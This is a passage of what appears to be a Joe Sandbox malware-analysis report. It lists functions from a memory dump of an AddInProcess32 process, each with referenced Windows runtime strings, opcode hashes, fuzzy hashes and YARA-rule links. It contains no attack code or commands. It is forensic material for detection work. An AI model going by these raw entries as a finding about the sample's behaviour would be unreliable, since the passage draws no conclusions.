                                                                                                                                                                                                                                        • String ID: #%u
                                                                                                                                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                                                                                                                                        • Opcode ID: f2c1d0e6d7fb93ae00281e043088e6ba46e1c992e13a958672b2ac88d739f918
                                                                                                                                                                                                                                        • Instruction ID: ac07dd888861d5b9a24131d703e6acd3bdaf6673bf08464ac3b3c4c47d775832
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2c1d0e6d7fb93ae00281e043088e6ba46e1c992e13a958672b2ac88d739f918
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8712871A0015A9FDB02DFA8C994FAEBBF8FF18704F144065E905E7251EA74EE41CBA1
                                                                                                                                                                                                                                        Function 017CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • LdrResSearchResource Exit, xrefs: 017CAA25
                                                                                                                                                                                                                                        • LdrResSearchResource Enter, xrefs: 017CAA13
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                                        • API String ID: 0-4066393604
                                                                                                                                                                                                                                        • Opcode ID: efdcea861e5d973f7ceebcd65c63ffbd46b31263ffb01c91f2821a738c2667d7
                                                                                                                                                                                                                                        • Instruction ID: 0df97b9e729912e0f45db97d90c22576525f58e4f3f34ae3fd94788c2a6e0624
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdcea861e5d973f7ceebcd65c63ffbd46b31263ffb01c91f2821a738c2667d7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0E17271A0061D9BEB228E9CC954BAEFBBAFF18715F10456EED01E7251E7349A80CB50
                                                                                                                                                                                                                                        Function 0188A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: `$`
                                                                                                                                                                                                                                        • API String ID: 0-197956300
                                                                                                                                                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                        • Instruction ID: 6de16cfbf43e9ebf7cdeef4df788677c1753e3e5046700b225a5335c5d3d3785
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDC1D4312043469BEB29EF28C841B2BBBE5AFC4318F184A2EF695C72D0D775D645CB52
                                                                                                                                                                                                                                        Function 0183E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                        • Opcode ID: 0399193a6ae080030ee31949f4135c230d934b94f8d5e313b29d94ca48d99813
                                                                                                                                                                                                                                        • Instruction ID: 8bc1ad0ba57b796f0f4fcb3588aa04ec006cf47bbfbacfe6517a36ee0156107b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0399193a6ae080030ee31949f4135c230d934b94f8d5e313b29d94ca48d99813
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2615071E003199FDB15DFA8C840BAEBBB5FB88704F58406DE649EB291D771AA40CB90
                                                                                                                                                                                                                                        Function 018643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$MUI
                                                                                                                                                                                                                                        • API String ID: 0-17815947
                                                                                                                                                                                                                                        • Opcode ID: 2971db773c12b2477fbf7ed97cd1fd9c49fc62cec1d2cc0a04edf872bf4adecd
                                                                                                                                                                                                                                        • Instruction ID: eed4623597cae992e142874549a43a3d626ab54172aa437781bf69e8d452507a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2971db773c12b2477fbf7ed97cd1fd9c49fc62cec1d2cc0a04edf872bf4adecd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B5117B1E0021DAEDB11DFA9CC99EEEBBBDEB48754F100529F611F7290D6709A05CB60
                                                                                                                                                                                                                                        Function 017C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017C063D
                                                                                                                                                                                                                                        • kLsE, xrefs: 017C0540
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                                                                                                                        • Opcode ID: 404b1e02f1490f73dbab7048efbac8d77a7345fd9c38ca10a4d430e7446ca2b5
                                                                                                                                                                                                                                        • Instruction ID: 06e4433cc0e889775d266104c9efbb07ba8983adb25954440d526f8ea7a1fcc6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 404b1e02f1490f73dbab7048efbac8d77a7345fd9c38ca10a4d430e7446ca2b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA518A79504742CFD725DF28C584AA7FBE4AF84B04F20492EEAAA87241E770D545CFD2
                                                                                                                                                                                                                                        Function 017CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 017CA2FB
                                                                                                                                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 017CA309
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                        • API String ID: 0-2876891731
                                                                                                                                                                                                                                        • Opcode ID: 441f4d4d21a3fcf2db59a909a39eefb76cff4dfa4a57f3445769c01307cfe397
                                                                                                                                                                                                                                        • Instruction ID: 0185ddf72fe2a87bf4251c37e9645c89862d9c70b368c543dadf3dc58c937821
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 441f4d4d21a3fcf2db59a909a39eefb76cff4dfa4a57f3445769c01307cfe397
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A41DE71A04659DBDB22CF6DC854B6EBBB5FF84B00F2440ADE900DB291E7B5DA80CB41
                                                                                                                                                                                                                                        Function 017FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                        • Opcode ID: 4007427cf3dffbf28d4f016b05a23a98149108380bb1bf7e64d52041c7dc3a7d
                                                                                                                                                                                                                                        • Instruction ID: 80eef33889c0e65a207c17531841c44bb6db73df84cc1d0259089eb88d767b15
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4007427cf3dffbf28d4f016b05a23a98149108380bb1bf7e64d52041c7dc3a7d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B001D1B2254704AFE322DF24CD49B16B7E8EB85725F01893DAA4CC7290E374D904CB46
                                                                                                                                                                                                                                        Function 017CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: MUI
                                                                                                                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                                                                                                                        • Opcode ID: 7a1e2af7bd18ebb9c0d5ef327e4956908005ca7fa10dd1ea048a2bf137309520
                                                                                                                                                                                                                                        • Instruction ID: 63111db99e29e914d6342dc7ee11caef6505c0dbb257aa39a833ffb604994160
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a1e2af7bd18ebb9c0d5ef327e4956908005ca7fa10dd1ea048a2bf137309520
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D824B75E002198BEB25CFADC884BEDFBB5BF48B10F14816DE959AB251D7309981CF90
                                                                                                                                                                                                                                        Function 01846420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                                        • Opcode ID: 1bb7d4c824d296e4a45ffb608cf0a91d6faf6692f22ccd63903b6d41f4d728b0
                                                                                                                                                                                                                                        • Instruction ID: 1e71db38ba28ee84a2297aea19bd48f8bd128906fca198a0d8c3eb52a525aed8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bb7d4c824d296e4a45ffb608cf0a91d6faf6692f22ccd63903b6d41f4d728b0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D916371940219AFEB21DF95CD89FAEBBB8EF59750F200055F600EB195EA74AE00CB91
                                                                                                                                                                                                                                        Function 0186E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                                        • Opcode ID: c309b573617f169c4fc3cfb331cc3d7b8b67126af10d7a295b43761a60b91122
                                                                                                                                                                                                                                        • Instruction ID: 7904974aad3eb6fb4d0d900c288ed16e95b9a98a99ae80f271397b3a5067fc48
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c309b573617f169c4fc3cfb331cc3d7b8b67126af10d7a295b43761a60b91122
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE91AE75900609AEDB22EFA4DD48FAFBBBEEF45740F100029F604EB251EB349A05CB51
                                                                                                                                                                                                                                        Function 017FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: GlobalTags
                                                                                                                                                                                                                                        • API String ID: 0-1106856819
                                                                                                                                                                                                                                        • Opcode ID: e310887322cb43b2750d4872cc3e4bb40fde1aa761420de2aa4ed8db5f603c8f
                                                                                                                                                                                                                                        • Instruction ID: 9d06c3a5cce7653eaa8d310b5333b8fa071dfd6a76bcd819af9d4d868031badd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e310887322cb43b2750d4872cc3e4bb40fde1aa761420de2aa4ed8db5f603c8f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28716E75E0020AABDF25CF9CC5906ADBBB1BF88704F28812DE505E7244F7718A41CB90
                                                                                                                                                                                                                                        Function 01864978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .mui
                                                                                                                                                                                                                                        • API String ID: 0-1199573805
                                                                                                                                                                                                                                        • Opcode ID: 553b5835ed50842c1a87423b8681785437be06abb2d4fef0c3010a041ed96e93
                                                                                                                                                                                                                                        • Instruction ID: bac1fc46465d25f4af79de8d451e67096ed6c959784bd556061568a95effb11f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 553b5835ed50842c1a87423b8681785437be06abb2d4fef0c3010a041ed96e93
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90519472D0022AABDF15DF99D844AAEFBB9AF14B14F05412DEA11FB250D7349E01CBE4
                                                                                                                                                                                                                                        Function 017DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: EXT-
                                                                                                                                                                                                                                        • API String ID: 0-1948896318
                                                                                                                                                                                                                                        • Opcode ID: 9bc28ca66895014be257460cd88f3d2fe0d4611bc381b4a69db46a65634191ed
                                                                                                                                                                                                                                        • Instruction ID: dc33a01dcb1234be222a66a5fedf285218898b6e8ef785c0ddf56f1d5af3581e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bc28ca66895014be257460cd88f3d2fe0d4611bc381b4a69db46a65634191ed
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D241927250831A9BD752DA75C884B6BF7F8AF88B24F45092DF584DB180EA74D904C7A3
                                                                                                                                                                                                                                        Function 0183C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BinaryHash
                                                                                                                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                                                                                                                        • Opcode ID: f5e68f0ea816a442a2da0570aa35c62adc105d4e6a7ced51ff52c700e2c8e113
                                                                                                                                                                                                                                        • Instruction ID: 03c63d059fe7a2104cb156fe227c50b9634daa86482fbc1ee3ef00d9d54a94dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5e68f0ea816a442a2da0570aa35c62adc105d4e6a7ced51ff52c700e2c8e113
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25414FB1D0012DAADB21DA54CC84F9EB77CAB44714F0445A6EA08FB181DB709F898FA5
                                                                                                                                                                                                                                        Function 01856B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                                                                                        • Opcode ID: 77ec16fb7bed1426fb01eac819f8d7804b167f4dc5334a72bd9f4fe735bcec3a
                                                                                                                                                                                                                                        • Instruction ID: 46a831db73119a272c634ce3de2ec3fc4a9ccd58c7e1f6bb6a2ac58c315bf94e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77ec16fb7bed1426fb01eac819f8d7804b167f4dc5334a72bd9f4fe735bcec3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD312A31A007099BEB62DB69C854BAEBBB8DF54704FA44028ED40EB282E775DE05CB50
                                                                                                                                                                                                                                        Function 0183CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BinaryName
                                                                                                                                                                                                                                        • API String ID: 0-215506332
                                                                                                                                                                                                                                        • Opcode ID: ead39dd6501c11966eb33e65032ad7b34f888ca78ddf772c36f124c828fd8404
                                                                                                                                                                                                                                        • Instruction ID: 5ea61212634ba05631a72ae5854d75c26ce4ea9d2f4b19bd32c82728778ffe6c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ead39dd6501c11966eb33e65032ad7b34f888ca78ddf772c36f124c828fd8404
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F31017690051AAFEB1ADB59C855E6FBB74EBC0720F09412AE905F7291D7309F00DBE0
                                                                                                                                                                                                                                        Function 0184892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0184895E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                        • API String ID: 0-702105204
                                                                                                                                                                                                                                        • Opcode ID: 54585f3299cbe3df83134aaeb5173f2a8abb6aa0d652ffd1bf3e1dd854cfe1ca
                                                                                                                                                                                                                                        • Instruction ID: f3098e7e7e4c2af41890f99699ee6d475a809b88c39bdaa489321554c83bba73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54585f3299cbe3df83134aaeb5173f2a8abb6aa0d652ffd1bf3e1dd854cfe1ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B012B35601B0A9FE6356F99CCC4A5A7F65EF87758B08001CF74196255CF216A41C792
                                                                                                                                                                                                                                        Function 01862000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5852421dd6dc6919d01becaabd61731da7541ed5423be221a5631fc3925604b4
                                                                                                                                                                                                                                        • Instruction ID: 8dc84d5721b38676088e6625632ef87e04535669e972db13e2ff446dd51e33ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5852421dd6dc6919d01becaabd61731da7541ed5423be221a5631fc3925604b4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A342D2716083458BD725CF68C890A6FFBEABF88304F08496DFA82D7250D775DA45CB52
                                                                                                                                                                                                                                        Function 01858158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6182cb905f17ead9f8348d936d42129d366cf458850921192c5290f914f1042b
                                                                                                                                                                                                                                        • Instruction ID: 244e28ccc4677ad5207926c93f19a6614bdcd67410d7aee031a710029ad8cc8c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6182cb905f17ead9f8348d936d42129d366cf458850921192c5290f914f1042b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4425F75E002198FEB65CF69C881BADBBF5FF49300F14819AE949EB242D7349A85CF50
                                                                                                                                                                                                                                        Function 017D2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 61469fa470d9e02cb9417b044c4b5f537fb0df22ddc3de5edf5d51eddd5962a5
                                                                                                                                                                                                                                        • Instruction ID: 5fc45cf7d4eb82a38fcf21cebd5a100bfbcefb6bb05e241248ac445a96e050b2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61469fa470d9e02cb9417b044c4b5f537fb0df22ddc3de5edf5d51eddd5962a5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9532C370A007698FDB26CF69C8447BEBBF2BF84704F24411DD946DB285E775AA82CB50
                                                                                                                                                                                                                                        Function 0186A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: be898433ea288b80f1043023b24d4ace40390e6783b17ab6301b299c42a0437b
                                                                                                                                                                                                                                        • Instruction ID: aa992a5571afee7ccfb3422735bbd3807676b1752f26e554c8a3109c63ba79d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be898433ea288b80f1043023b24d4ace40390e6783b17ab6301b299c42a0437b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F722E2702046658BEB29CF2DC494372BBF9BF45304F088459E997EF286D735EA52CB60
                                                                                                                                                                                                                                        Function 017C6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e5f3ffb32177be739dd2f6e9509b2f0aa0273f35d3d83d8afd70c2b8a76f5657
                                                                                                                                                                                                                                        • Instruction ID: abe9a277434f7fd2f632dfda844dcf1b363f345575628f9bf26086f873cbb378
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5f3ffb32177be739dd2f6e9509b2f0aa0273f35d3d83d8afd70c2b8a76f5657
